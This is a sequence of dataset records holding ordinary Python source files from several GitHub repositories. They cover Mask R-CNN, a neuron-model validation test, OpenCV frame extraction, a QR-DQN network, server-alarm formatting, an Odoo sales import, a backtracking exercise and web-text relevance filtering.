name=\"ROI\",\n config=config)([rpn_class, rpn_bbox, anchors])\n\n\n\n # Network Heads\n # Proposal classifier and BBox regressor heads\n mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\\\n fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta,\n config.POOL_SIZE, config.NUM_CLASSES,\n train_bn=config.TRAIN_BN,\n fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)\n\n # Detections\n # output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in\n # normalized coordinates\n detections = DetectionLayer(config, name=\"mrcnn_detection\")(\n [rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta])\n\n # Create masks for detections\n detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections)\n mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps,\n input_image_meta,\n config.MASK_POOL_SIZE,\n config.NUM_CLASSES,\n train_bn=config.TRAIN_BN)\n model = KM.Model(input_image,\n [detections, mrcnn_class, mrcnn_bbox,\n mrcnn_mask, rpn_rois, rpn_class, rpn_bbox],\n name='mask_rcnn')\n\n # Add multi-GPU support.\n #if config.GPU_COUNT > 1:\n # from mrcnn.parallel_model import ParallelModel\n # model = ParallelModel(model, config.GPU_COUNT)\n\n return model","repo_name":"pchataignier/masters","sub_path":"Movidius/InferenceModel.py","file_name":"InferenceModel.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30617543106","text":"# ============================================================================\n# test_for_firing_without_dendrites.py\n#\n# created 03 Octoberber 2017 Lungsi\n# modified \n#\n# Use case:\n# o first import the test\n# from cerebunit.validation_tests.cells.PurkinjeCell\n# import NoDendritesTest as noDendtest\n# o experimental_data is the loaded json data wrapped\n# with python quantities. 
This is handled by the\n# HBP validation framework.\n# o instantiate the noDendtest with experimental_data\n# test = noDendtest(experimental_data)\n# o run the test on desired model\n# s = test.judge(desired_model, deep_error=True)\n# o then you can see the outputs to\n# s\n# s.score\n# s.description\n#\n# ============================================================================\n\nimport sciunit\nimport quantities as pq\nfrom elephant.statistics import mean_firing_rate as mfr\n\nfrom cerebunit.capabilities.cells.response import ProducesSpikeTrain\nfrom cerebunit.capabilities.cells.morphology import CanDisconnectDendrites\nfrom cerebunit.score_manager import BinaryScore\n\n\nclass NoDendritesTest(sciunit.Test, BinaryScore):\n '''\n The No Dendrites Test is a test for whether firing occurs (from the soma) when all the dendrites are disconnected from the soma. There is no current injection for this test.\n '''\n required_capabilities = (CanDisconnectDendrites,ProducesSpikeTrain,)\n score_type = BinaryScore\n\n def generate_prediction(self, model, verbose=False):\n '''\n Generates spike train from \"vm_soma\", cell region.\n The function is automatically called by sciunit.Test\n which this test is a child of.\n Therefore as part of sciunit generate_prediction is\n mandatory.\n '''\n setup_parameters = { \"dt\": 0.025, \"celsius\": 37,\n \"tstop\": 1000, \"v_init\": -65 }\n model.disconnect_dendrites_from_soma()\n model.set_simulation_properties(setup_parameters)\n model.produce_spike_train()\n return model\n\n def process_prediction(self, model):\n '''\n Once the model has run, this function can be used to\n process the spike_train prediction to get the\n prediction of interest, mean firing rate.\n '''\n cell_region = \"vm_soma\"\n x = mfr(model.predictions[\"spike_train\"][cell_region])\n return x.rescale(pq.Hz)\n\n\n def compute_score(self, observation, model, verbose=False):\n '''\n This is function like generate_prediction is called\n automatically by sciunit which this test is a child of.\n This function with the same name compute_score is also\n therefore mandatory.\n This function calls the function process_prediction to\n return the mean firing rate of spike train from vm_soma.\n This is then compared against the experimental_data to\n get the binary score; 0 if the prediction correspond\n with experiment, otherwise 1.\n '''\n processed_prediction = self.process_prediction(model)\n a_prediction = processed_prediction.item() # just the magnitude\n x = BinaryScore.compute( observation, a_prediction )\n score = BinaryScore(x)\n score.description = \"The No Dendrites attached to soma, Soma Firing test results in the prediction by the model to be \" + str(processed_prediction) + \" which means that the \" + str(score)\n if score.score==1:\n ans = \"The model \" + model.name + \" passed the \" + self.__class__.__name__ + \". It shows that firing from the soma is not due to the dendrites, i.e, spike originates from soma.\"\n else:\n ans = \"The model \" + model.name + \" failed the \" + self.__class__.__name__ + \". 
It shows that firing from the soma is due to the dendrites, i.e, spike does not originate from soma.\"\n return score\n","repo_name":"lungsi/cerebellum-unit","sub_path":"cerebunit/validation_tests/cells/PurkinjeCell/test_for_firing_without_dendrites.py","file_name":"test_for_firing_without_dendrites.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1423828526","text":"import cv2\r\n\r\n#open the Video file\r\n#cap = cv2.VideoCapture(0)\r\ncap = cv2.VideoCapture('IU.mp4')\r\ni = 0\r\n\r\nwhile(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret == False:\r\n break\r\n\r\n cv2.imshow('hello', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n cv2.imwrite(str(i)+ '.jpg', frame)\r\n i +=1\r\n\r\n#cap.release()\r\ncv2.destroyAllWindows()","repo_name":"yinmayoo185/OpenCV","sub_path":"Face Recognition System/video-processing.py","file_name":"video-processing.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8485915032","text":"import numpy as np\nfrom torch import nn\n\n\nclass QRDQN(nn.Module):\n\n def __init__(self, num_states, num_actions, N=200,\n sensitive=None, c=0):\n super(QRDQN, self).__init__()\n\n # Quantile network.\n self.q_net = nn.Sequential(\n nn.Linear(num_states, 512),\n nn.ReLU(),\n nn.Linear(512, num_actions * N),\n )\n\n self.N = N\n self.num_actions = num_actions\n self.sensitive = sensitive\n self.c = c\n self.num_cvar = int(np.ceil(self.N * self.c))\n\n def forward(self, states=None):\n batch_size = states.shape[0]\n\n quantiles = self.q_net(states).view(\n batch_size, self.N, self.num_actions)\n\n assert quantiles.shape == (batch_size, self.N, self.num_actions)\n\n return quantiles\n\n def calculate_q(self, states=None):\n batch_size = states.shape[0]\n\n # Calculate quantiles.\n quantiles = self(states=states)\n\n if self.c == 0:\n quantiles = quantiles\n elif self.sensitive:\n quantiles = quantiles[:, :self.num_cvar]\n else:\n quantiles = quantiles[:, -self.num_cvar+1:]\n\n # Calculate expectations of value distributions.\n q = quantiles.mean(dim=1)\n assert q.shape == (batch_size, self.num_actions)\n\n return q\n","repo_name":"ShogoAkiyama/rltorch2","sub_path":"frozen_lake/fqf_iqn/model/qrdqn.py","file_name":"qrdqn.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1906912209","text":"# 本程序找出list中告警数据(根据config中的告警值),并组合成一个大字符串,以备在钉钉中发出\nimport configRead\ndef color(infomationList):\n cpuAlarm1 = int(configRead.readConfig('alarm','cpuAlarm1')) # CPU 利用率超60%报警\n cpuAlarm2 = int(configRead.readConfig('alarm','cpuAlarm2')) # CPU 利用率超90%报警\n memAlarm1 = int(configRead.readConfig('alarm','memAlarm1')) # MEM 利用率超70%报警\n memAlarm2 = int(configRead.readConfig('alarm','memAlarm2')) # MEM 利用率超95%报警\n diskAlarm1 = int(configRead.readConfig('alarm','diskAlarm1')) # 磁盘 剩余空间低于30G 报橙色警\n diskAlarm2 = int(configRead.readConfig('alarm','diskAlarm2')) # 磁盘 剩余空间低于10G 报红色警\n \n alarmList=[]\n\n timeOut = configRead.readConfig('parameter','timeout')\n timeOut = '超时 time >'+str(timeOut)\n for line in infomationList:\n alarmLine=[]\n alarmLine.append(line[0])\n alarmLine.append(line[1])\n alarmLine.append(line[2])\n alarmLine.append(line[3])\n \n if line[3]==timeOut:\n alarmList.append(alarmLine)\n continue\n\n \n CPU = line[4]\n MEM = line[5]\n \n #CPU 报警处理 \n if 
int(line[4])>cpuAlarm2:\n CPU= giveColor(line[4],1)\n elif int(line[4])>cpuAlarm1:\n CPU= giveColor(line[4],2)\n \n CPU= 'CPU='+CPU+'%'\n alarmLine.append(CPU)\n\n #MEM 报警处理\n if int(line[5])>memAlarm2:\n MEM= giveColor(line[5],1)\n elif int(line[5])>memAlarm1:\n MEM= giveColor(line[5],2)\n MEM= 'MEM='+MEM+'%'\n alarmLine.append(MEM)\n\n alldisk = line[6].split(' ')\n diskstr=\"DISK: \"\n for d in alldisk:\n if d=='': #排除空值\n continue\n disk=d.split(':')\n diskAvliable=disk[1].split(r'/')\n if (int(diskAvliable[0])<diskAlarm2) and (int(diskAvliable[1])>6): #剔除光驱 \n diskstr = diskstr + disk[0]+':'+ giveColor(diskAvliable[0],1) +r'/'+diskAvliable[1]+' '\n elif (int(diskAvliable[0])<diskAlarm1) and (int(diskAvliable[1])>6): #剔除光驱:\n diskstr = diskstr + disk[0]+':'+ giveColor(diskAvliable[0],2) +r'/'+diskAvliable[1]+' '\n else:\n diskstr = diskstr + disk[0]+':'+ diskAvliable[0] +r'/'+diskAvliable[1]+' '\n\n\n alarmLine.append(diskstr)\n \n alarmList.append(alarmLine)\n return alarmList\n\n\ndef giveColor(string,color=1):\n if color==1:\n return '<font color=\"red\">' + string + '</font>'\n else:\n return '<font color=\"orange\">' + string + '</font>'\n","repo_name":"sigerclx/python","sub_path":"python-book01/2018/2018-06/ServerHealth3/htmlAlarm.py","file_name":"htmlAlarm.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"4106342287","text":"from jinja2 import Environment, FileSystemLoader\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport logging\n\nlog = logging.getLogger(\"output/template\")\n\n\nclass Template:\n def __init__(self, filename, template):\n self.filename = Path(datetime.now().strftime(filename))\n self.template = Path(template)\n\n def run(self, alertslist, steps, raw_config, time):\n file_loader = FileSystemLoader(str(self.template.parent))\n env = Environment(loader=file_loader)\n template = env.get_template(self.template.name)\n output = template.render(\n time=time, steps=steps, raw_config=raw_config, **alertslist.get_vars()\n )\n\n self.filename.write_text(output)\n log.info(f\"Wrote report to {self.filename} using template {self.template}\")\n","repo_name":"danielfett/yesses","sub_path":"yesses/outputs/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"}
{"seq_id":"15799314962","text":"import couchdb\nimport json\nimport sys\nimport requests\nimport argparse\n\n#This file is connecting the backend and frontend\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\", \"--name\", help = \"Enter the name of the design document!\", required = True)\n parser.add_argument(\"-s\", \"--server\", help = \"Enter the ip address of your Couchdb Server! 
Please INCLUDE USERNAME:PASSWORD and end with '/'!!!\", required = True)\n parser.add_argument(\"-d\", \"--database\", help = \"Enter your Database's name!\", required = True)\n args = parser.parse_args()\n\n view_name = str(args.name)\n ip = str(args.server)\n db_name = str(args.database)\n\n server = couchdb.Server(ip)\n db = server[db_name]\n\n try:\n total = json.loads(requests.get(ip + db_name + \"/_design/\" + view_name + \"/_view/count\").text)[\"rows\"][0]['value']\n result = json.loads(requests.get(ip + db_name + \"/_design/\" + view_name + \"/_view/point_without_zero\").text)[\"rows\"]\n points = 0\n pos_count = 0\n ngtv_count = 0\n\n for i in range(0, len(result)):\n points += float(result[i]['value'])\n if float(result[i]['value']) > 0:\n pos_count += 1\n elif float(result[i]['value']) < 0:\n ngtv_count += 1\n \n pos_percent = pos_count / total\n nega_percent = ngtv_count / total\n\n print(total)\n print(pos_percent)\n print(nega_percent)\n\n except Exception as e:\n print(\"Error Here\")\n sys.exit(1)","repo_name":"cchalres/ccc-assmt2","sub_path":"MapReduce-Yucheng-Gu-955069/FrontEnd.py","file_name":"FrontEnd.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16790579868","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import UserError, ValidationError\nfrom datetime import datetime\n\n\nclass IFDBPowerNetSalesHeader(models.Model):\n _name = 'ss_erp.ifdb.powernet.sales.header'\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _description = 'PowerNetヘッダ'\n\n upload_date = fields.Datetime('アップロード日時', index=True,\n default=fields.Datetime.now)\n name = fields.Char('名称')\n user_id = fields.Many2one('res.users', '担当者', index=True)\n branch_id = fields.Many2one('ss_erp.organization', '支店', index=True)\n status = fields.Selection(selection=[\n ('wait', '処理待ち'),\n ('success', '成功'),\n ('error', 'エラーあり')\n ], string='ステータス', default=\"wait\", store=True, compute='_compute_status')\n\n powernet_sale_record_ids = fields.One2many(\n comodel_name=\"ss_erp.ifdb.powernet.sales.detail\",\n inverse_name=\"powernet_sales_header_id\",\n string=\"PowerNet販売記録の詳細\"\n )\n has_data_import = fields.Boolean(compute='_compute_has_data_import')\n\n @api.constrains(\"branch_id\")\n def _check_default_warehouse(self):\n for record in self:\n if not record.branch_id.warehouse_id:\n raise ValidationError(_(\"対象の支店にデフォルト倉庫が設定されていません。組織マスタの設定を確認してください。\"))\n\n @api.depends('powernet_sale_record_ids')\n def _compute_has_data_import(self):\n for record in self:\n if record.powernet_sale_record_ids:\n record.has_data_import = True\n else:\n record.has_data_import = False\n\n @api.constrains(\"name\")\n def _check_name(self):\n for record in self:\n name_unique = self.env['ss_erp.ifdb.powernet.sales.header'].search_count(\n [('name', '=', record.name)])\n if name_unique > 1:\n raise ValidationError(_(\"ファイルヘッダー名は検索に使用されます。一意にしてください。\"))\n\n @api.depends('powernet_sale_record_ids.status')\n def _compute_status(self):\n for record in self:\n record.status = 'wait'\n if record.powernet_sale_record_ids:\n status_list = record.powernet_sale_record_ids.mapped('status')\n if 'error' in status_list:\n record.status = 'error'\n elif 'wait' in status_list:\n record.status = 'wait'\n else:\n record.status = 'success'\n\n def action_import(self):\n self.ensure_one()\n self.upload_date = fields.Datetime.now()\n return {\n \"type\": \"ir.actions.client\",\n \"tag\": \"import\",\n \"params\": {\n 
\"model\": \"ss_erp.ifdb.powernet.sales.detail\",\n \"context\": {\n \"default_import_file_header_model\": self._name,\n \"default_import_file_header_id\": self.id,\n },\n }\n }\n\n def processing_execution(self):\n for r in self:\n r._processing_excution()\n\n def _processing_excution(self):\n self.ensure_one()\n\n customer_code = self.env['ir.config_parameter'].sudo().get_param('powernet.direct.sales.dummy.customer_id')\n if not customer_code:\n raise UserError(\n _('直売売上用の顧客コードの取得失敗しました。システムパラメータに次のキーが設定されているか確認してください。(powernet.direct.sales.dummy.customer_id)'))\n\n customer_id = self.env['res.partner'].search([('ref', '=', customer_code)], limit=1)\n if not customer_id:\n raise UserError(\n _('設定している取引先コードは存在しません。'))\n\n # 2022/06/30 設計書の変更によりの追加\n gas_product_id = self.env['ir.config_parameter'].sudo().get_param('powernet.gas.basic.charge.product_id')\n if not gas_product_id:\n raise UserError(\n _('ガス基本料金のプロダクトIDの取得失敗しました。システムパラメータに次のキーが設定されているか確認してください。(powernet.gas.basic.charge.product_id)'))\n\n gas_usage_product_id = self.env['ir.config_parameter'].sudo().get_param('powernet.gas.usage.fee.product_id')\n if not gas_usage_product_id:\n raise UserError(\n _('ガス従量料金のプロダクトIDの取得失敗しました。システムパラメータに次のキーが設定されているか確認してください。(powernet.gas.usage.fee.product_id)'))\n\n product_ids = self.env['product.template'].search([]).ids\n if int(gas_product_id) not in product_ids or int(gas_usage_product_id) not in product_ids:\n raise UserError(\n _('設定しているプロダクトIDは、プロダクトマスタに存在しません。プロダクトマスタを確認してください。'))\n\n exe_data = self.powernet_sale_record_ids.filtered(lambda line: line.status in ('wait', 'error')).sorted(\n key=lambda k: (k['sales_date'], k['customer_code'], k['data_types']))\n\n # Get list product uom exchange\n powernet_type_ids = self.env['ss_erp.external.system.type'].search([('code', '=', 'power_net')]).mapped('id')\n convert_product_unit_type_ids = self.env['ss_erp.convert.code.type'].search(\n [('code', '=', 'product_unit')]).mapped('id')\n uom_code_convert = self.env['ss_erp.code.convert'].search(\n [('external_system', 'in', powernet_type_ids),\n ('convert_code_type', 'in', convert_product_unit_type_ids)]).sorted(\n key=lambda k: (k['external_code'], k['priority_conversion']))\n\n uom_dict = {}\n for uom in uom_code_convert:\n if not uom_dict.get(uom['external_code']):\n uom_dict[uom['external_code']] = uom['internal_code'].id\n\n tax_dict = {}\n tax_ids = self.env['ss_erp.code.convert'].search([]).filtered(\n lambda x: x.external_system.code == 'power_net' and x.convert_code_type.code == 'tax')\n for tax in tax_ids:\n tax_dict[tax.external_code] = tax.internal_code.id\n\n list_product_ids = self.env['product.product'].search([])\n product_product_ids = list_product_ids.mapped('id')\n\n base_gas_charge_id = list_product_ids.filtered(lambda x: x.product_tmpl_id.name == 'ガス基本料金').id\n metered_gas_charge_id = list_product_ids.filtered(lambda x: x.product_tmpl_id.name == 'ガス従量料金').id\n\n failed_so = []\n success_dict = {}\n for line in exe_data:\n key = str(line.sales_date) + '_' + str(line.customer_code)\n error_message = False\n if int(line.product_code) not in product_product_ids:\n line.status = 'error'\n error_message = '商品コードがプロダクトマスタに存在しません。'\n\n if not uom_dict.get(line.unit_code):\n line.status = 'error'\n if error_message:\n error_message += '単位コードの変換に失敗しました。コード変換マスタを確認してください。'\n else:\n error_message = '単位コードの変換に失敗しました。コード変換マスタを確認してください。'\n\n if not tax_dict.get(line.search_remarks_4):\n line.status = 'error'\n if error_message:\n error_message += '税コードの変換に失敗しました。コード変換マスタを確認してください。'\n 
else:\n error_message = '税コードの変換に失敗しました。コード変換マスタを確認してください。'\n\n if not error_message:\n if key in failed_so:\n continue\n else:\n # 2022/06/30 販売伝票を作成する際に、プロダクトIDが上記で取得したガス基本料金のプロダクトIDと一致する場合、数量を「1」で更新する。\n if int(line.product_code) == int(gas_product_id):\n quantity = 1\n product_id = int(gas_product_id)\n if line.product_name == 'ガス従量料金':\n product_id = int(gas_usage_product_id)\n else:\n quantity = line.quantity\n product_id = int(line.product_code)\n\n order_line = {\n 'product_id': product_id,\n 'product_uom_qty': quantity,\n 'product_uom': uom_dict[line.unit_code],\n 'tax_id': [(4, tax_dict.get(line.search_remarks_4))]\n }\n\n # 2022/05/09 Add new client_order_ref\n client_order_ref = '%s:%s' % (line.customer_code, line.search_remarks_6)\n\n if not success_dict.get(key):\n so = {\n 'x_organization_id': self.branch_id.id,\n 'warehouse_id': self.branch_id.warehouse_id.id,\n 'partner_id': customer_id.id,\n 'partner_invoice_id': customer_id.id,\n 'partner_shipping_id': customer_id.id,\n 'date_order': line.sales_date,\n 'state': 'draft',\n 'x_no_approval_required_flag': True,\n 'order_line': [(0, 0, order_line)],\n 'client_order_ref': client_order_ref,\n }\n success_dict[key] = so\n else:\n success_dict[key]['order_line'].append((0, 0, order_line))\n else:\n if key not in failed_so:\n failed_so.append(key)\n if success_dict.get(key, False):\n success_dict.pop(key, None)\n line.write({\n 'status': 'error',\n 'error_message': error_message\n })\n\n for key, value in success_dict.items():\n sale_id = self.env['sale.order'].create(value)\n success_dict[key]['sale_id'] = sale_id.id\n\n success_list = success_dict.keys()\n for line in exe_data:\n key = str(line.sales_date) + '_' + str(line.customer_code)\n if key in success_list:\n line.update({\n 'status': 'success',\n 'sale_id': success_dict[key]['sale_id'],\n 'processing_date': datetime.now(),\n 'error_message': False,\n })\n\n\nclass IFDBPowerNetSalesHeadDetail(models.Model):\n _name = 'ss_erp.ifdb.powernet.sales.detail'\n _description = 'PowerNet詳細'\n\n powernet_sales_header_id = fields.Many2one('ss_erp.ifdb.powernet.sales.header', 'PowerNetセールスヘッダー',\n required=True, ondelete=\"cascade\")\n status = fields.Selection(selection=[\n ('wait', '処理待ち'),\n ('success', '成功'),\n ('error', 'エラー')\n ], string='ステータス', default=\"wait\", required=True)\n processing_date = fields.Datetime('処理日時', index=True)\n customer_code = fields.Char('需要家コード', index=True)\n billing_summary_code = fields.Char('請求まとめコード')\n sales_date = fields.Date('売上日', index=True)\n slip_type = fields.Char('伝票種類')\n slip_no = fields.Char('伝票No')\n data_types = fields.Char('データ種類', index=True)\n cash_classification = fields.Char('現金/掛け区分')\n product_code = fields.Char('商品コード')\n product_code_2 = fields.Char('商品コード 2')\n product_name = fields.Char('商品名')\n product_remarks = fields.Char('商品備考')\n sales_category = fields.Char('売上区分')\n quantity = fields.Float('数量')\n unit_code = fields.Char('単位コード')\n unit_price = fields.Float('単価')\n amount_of_money = fields.Float('金額')\n consumption_tax = fields.Float('消費税')\n sales_amount = fields.Float('売上額')\n quantity_after_conversion = fields.Float('換算後数量')\n search_remarks_1 = fields.Char('検索備考 1')\n search_remarks_2 = fields.Char('検索備考 2')\n search_remarks_3 = fields.Char('検索備考 3')\n search_remarks_4 = fields.Char('検索備考 4')\n search_remarks_5 = fields.Char('検索備考 5')\n search_remarks_6 = fields.Char('検索備考 6')\n search_remarks_7 = fields.Char('検索備考 7')\n search_remarks_8 = fields.Char('検索備考 8')\n search_remarks_9 = fields.Char('検索備考 9')\n 
search_remarks_10 = fields.Char('検索備考 10')\n sales_classification_code_1 = fields.Char('販売分類コード 1')\n sales_classification_code_2 = fields.Char('販売分類コード 2')\n sales_classification_code_3 = fields.Char('販売分類コード 3')\n consumer_sales_classification_code_1 = fields.Char('需要家販売分類コード 1')\n consumer_sales_classification_code_2 = fields.Char('需要家販売分類コード 2')\n consumer_sales_classification_code_3 = fields.Char('需要家販売分類コード 3')\n consumer_sales_classification_code_4 = fields.Char('需要家販売分類コード 4')\n consumer_sales_classification_code_5 = fields.Char('需要家販売分類コード 5')\n product_classification_code_1 = fields.Char('商品分類コード 1')\n product_classification_code_2 = fields.Char('商品分類コード 2')\n product_classification_code_3 = fields.Char('商品分類コード 3')\n error_message = fields.Char('エラーメッセージ')\n sale_id = fields.Many2one('sale.order', '販売オーダ参照')\n","repo_name":"alubena/sanin-sanso-training","sub_path":"ss_erp_external_data_import/models/ss_erp_ifdb_powernet_sales_header.py","file_name":"ss_erp_ifdb_powernet_sales_header.py","file_ext":"py","file_size_in_byte":14195,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10235082156","text":"'''\n< N & M >\n문제)\n- N개의 자연수와 자연수 M이 주어졌을 때, 아래 조건을 만족하는 길이가 M인 수열을 모두 구하는 프로그램을 작성 하시오\n - N개의 자연수 중에서 M개를 고른 수열\n입력)\n- 1 : N, M ~ [1 \\ 8]\n- 2 : N개의 수가 주어진다.\n출력)\n- 1 : 조건에 만족하는 수열 출력 중복되는 수열 여러번 출력하면 안됨\\\n 사전순 출력\n'''\nimport sys\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\nnums = list(map(int, input().split()))\nnums.sort()\nvisited = [0] * (n)\ntmp = []\n\ndef dfs(x):\n global tmp, visited\n if x == m:\n print(*tmp)\n return\n prev = 0\n for i in range(n):\n if visited[n]: continue\n if nums[i] == prev: continue\n visited[i] = 1\n tmp.append(nums[i])\n prev = nums[i]\n dfs(x + 1)\n visited[i] = 0\n tmp.pop()\n\ndfs(0)\n\n\n \n\n","repo_name":"ByeonghwiJeong/Algorithm_Study","sub_path":"05_Study/23_01/07_백트레킹/15663.py","file_name":"15663.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74603310501","text":"import pandas as pd\r\nimport csv\r\nimport sys\r\nimport re\r\n\r\n\r\n\"\"\"\r\nheuristic: remove textual content that appears at least on x% of subpages of a domain\r\nand delete duplicate text information\r\n-> alternatively: delete non-unique text information!\r\nTO-DO: consider tag path as well (?)\r\n\"\"\"\r\ndef withinRelev(mode):\r\n data = pd.read_csv(\"data.csv\", sep=\";\")\r\n temp = data.groupby([\"bvdidID\", \"text\"]).nunique(\"urlID\")\r\n temp[\"bvdidID\"] = [i[0] for i in temp.index]\r\n temp[\"text\"] = [i[1] for i in temp.index]\r\n temp = temp.reset_index(drop=True)\r\n if mode==\"all\":\r\n ##only keep unique text information\r\n temp = temp[temp[\"urlID\"]==1]\r\n data = pd.merge(data, temp, on=[\"bvdidID\", \"text\"], how=\"inner\")\r\n else:\r\n ##remove text that appears on x% of the subpages\r\n countUrl = data.groupby([\"bvdidID\"]).nunique(\"urlID\")\r\n countUrl[\"bvdidID\"] = countUrl.index\r\n combined = pd.merge(temp[[\"bvdidID\",\"text\",\"urlID\"]],countUrl[[\"bvdidID\",\"urlID\"]],\"left\",on=\"bvdidID\")\r\n combined = combined[combined[\"urlID_x\"]<0.8*combined[\"urlID_y\"]]\r\n ##index text variable -> check for large data amounts\r\n data = pd.merge(data, combined[[\"bvdidID\", \"text\"]], [\"bvdidID\", \"text\"], how=\"inner\")\r\n ##remove duplicate text\r\n data = data.drop_duplicates([\"bvdidID\", \"text\"])\r\n 
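    # hypothetical clarifying comment: write the deduplicated rows out for the next processing step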
data.to_csv(\"data1.csv\", sep=\";\", index=False, encoding=\"utf-8\", quoting=csv.QUOTE_ALL)\r\n\r\n\r\n\"\"\"\r\nprepare labelled data for between relevance classification\r\nassumptions: rel.: first page of domain and heuristic based; irrel.: heuristic based\r\n\"\"\"\r\ndef prepData4BR():\r\n data = pd.read_csv(\"data_embedded.csv\", sep=\";\")\r\n data[\"text2id\"] = data[\"text2id\"].apply(lambda x: list(map(int, re.findall(\"\\d+\", x))))\r\n ##to-do: used indexing when speed issues\r\n urls = data[\"url_x\"].unique()\r\n ##main page\r\n subdata = data[data[\"urlID_x\"]==0]\r\n relev = pd.DataFrame(subdata.groupby(\"bvdidID\")[\"text2id\"].apply(lambda x: x.sum()))\r\n relev.reset_index(inplace=True)\r\n relev[\"urlID_x\"] = 0\r\n ##list of keywords in urls that very likely define a relevant webpage\r\n identRelev = \"(about|product|service)\"\r\n keepRelev = [i for i in urls if re.search(identRelev,i) is not None]\r\n relev2 = data[data[\"url_x\"].isin(keepRelev)]\r\n relev2 = pd.DataFrame(relev2.groupby([\"bvdidID\", \"urlID_x\"])[\"text2id\"].apply(lambda x: x.sum()))\r\n relev2.reset_index(inplace=True)\r\n relev = relev.append(relev2, sort=True)\r\n relev[\"relevant\"] = 1\r\n ##list of keywords in urls that very likely define an irrelevant webpage\r\n identIrrelev = \"(termsofuse|privacy|data|contact|impressum|search|disclaimer|cookie|investors|site-terms|faqs|compliance|login|support)\"\r\n keepIrrelev = [i for i in urls if re.search(identIrrelev,i) is not None]\r\n irrelev = data[data[\"url_x\"].isin(keepIrrelev)]\r\n irrelev = pd.DataFrame(data.groupby([\"bvdidID\", \"urlID_x\"])[\"text2id\"].apply(lambda x: x.sum()))\r\n irrelev.reset_index(inplace=True)\r\n irrelev[\"relevant\"] = 0\r\n output = pd.concat([relev, irrelev], axis=0, ignore_index=True, sort=True)\r\n ##to-do: check for ambigious cases\r\n output = output.drop_duplicates([\"bvdidID\", \"urlID_x\"])\r\n output.to_csv(\"dataBetweenRelevance.csv\", sep=\";\", index=False, encoding=\"utf-8\", quoting=csv.QUOTE_ALL)\r\n \r\n\r\n\"\"\"\r\nremove complete subdomains related to AGBs, data privacy, and similar\r\n\"\"\"\r\ndef betweenRelev():\r\n prepData4BR()\r\n ##estimate classification model in tf using word embeddings\r\n ...\r\n\r\n\r\nif __name__==\"__main__\":\r\n if sys.argv[1]==\"within\":\r\n withinRelev(mode=\"all\")\r\n elif sys.argv[1]==\"between\":\r\n prepData4BR()\r\n ##betweenRelev()\r\n else:\r\n raise ValueError(\"Please provide a valid argument.\")\r\n","repo_name":"jakob-ra/webcrawl_networks","sub_path":"code/relevantText.py","file_name":"relevantText.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34301003061","text":"import os\n\nfrom fparser.common.readfortran import FortranStringReader\nfrom psyclone.psyGen import PSyFactory\nfrom psyclone.transformations import ACCEnterDataTrans, ACCKernelsTrans\n\n\n# Constants\nAPI = \"nemo\"\n# Location of the Fortran files associated with these tests\nBASE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n \"../../test_files\")\n\n# Test code with explicit NEMO-style do loop\nEXPLICIT_DO = (\"program explicit_do\\n\"\n \" REAL :: r\\n\"\n \" INTEGER :: ji, jj, jk\\n\"\n \" INTEGER, PARAMETER :: jpi=3, jpj=5, jpk=7\\n\"\n \" REAL, DIMENSION(jpi, jpj, jpk) :: umask\\n\"\n \" DO jk = 1, jpk\\n\"\n \" DO jj = 1, jpj\\n\"\n \" DO ji = 1, jpi\\n\"\n \" umask(ji,jj,jk) = ji*jj*jk/r\\n\"\n \" END DO\\n\"\n \" END DO\\n\"\n \" END DO\\n\"\n 
\"end program explicit_do\\n\")\n\n\ndef test_apply_to_explicit_loop(parser, fortran_writer):\n '''\n Check code generation for enclosing a single explicit loop containing a\n kernel inside a data region.\n\n '''\n reader = FortranStringReader(EXPLICIT_DO)\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.get('explicit_do').schedule\n acc_kernels = ACCKernelsTrans()\n acc_kernels.apply(schedule.children)\n acc_trans = ACCEnterDataTrans()\n acc_trans.apply(schedule)\n code = fortran_writer(schedule)\n # Check the enter data directive captures all variables read and written in\n # the loop except for the NEMO loop iterator variables.\n assert (\" real, dimension(jpi,jpj,jpk) :: umask\\n\"\n \"\\n\"\n \" !$acc enter data copyin(jpi,jpj,jpk,r,umask)\\n\"\n \" !$acc kernels\\n\"\n \" do jk = 1, jpk\") in code\n\n assert (\" enddo\\n\"\n \" !$acc end kernels\\n\"\n \"\\n\"\n \"end program explicit_do\") in 